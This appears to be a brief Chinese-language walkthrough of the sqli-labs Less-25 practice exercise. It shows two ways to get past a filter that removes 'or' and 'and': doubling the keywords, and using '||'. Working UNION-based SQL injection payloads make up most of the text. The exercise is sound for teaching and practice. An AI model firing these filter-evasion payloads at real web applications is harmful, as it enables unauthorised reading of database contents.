网页提示对'or' & 'and' 过滤,注入时可以通过将关键字夹杂在字符串中绕过过滤,如下
绕过方式1:双写绕过
127.0.0.1/sqli-labs/Less-25/?id=-1%27%20union%20select%201,2,3%20anandd%201=%271#
绕过方式2:使用|| 替代 or
?id=-1' union select 1,@@version,3 || 1='1#
之后对select 1,2进行注入,这里用and 1='1#进行了闭合,也可以直接在select1,2,后面闭合。在注入语句中不使用or/and
/?id=-1' union select 1,2,1='1#